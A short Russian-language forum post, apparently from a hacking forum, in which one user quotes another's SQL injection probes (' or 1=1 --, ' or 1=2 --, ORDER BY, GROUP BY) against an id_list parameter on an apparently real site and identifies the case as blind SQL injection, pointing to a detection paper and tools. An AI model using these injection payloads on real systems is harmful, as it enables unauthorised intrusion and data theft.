08.04.2017, 13:46
|
|
Познающий
Регистрация: 13.10.2016
Сообщений: 33
С нами:
5043926
Репутация:
0
|
|
Сообщение от ACat
↑
Вернее что бы не быть голословным вот реальный пример:
?id_list=359982' or 1=1 -- 'a --> вывод
?id_list=359982' or 1=2 -- 'a --> 404
?id_list=359982' ORDER BY 1 -- 'a --> 404
?id_list=359982' GROUP BY 1 -- 'a --> 404
Напомню что ошибки не отображаются.
Эни айдиас?
это blind sql
Про инекции и Способы обнаружения Blind SQL-инъекций:
https://www.ptsecurity.com/upload/co...-Injection.pdf
софт: /threads/240692/
или ручками крути
|
|
|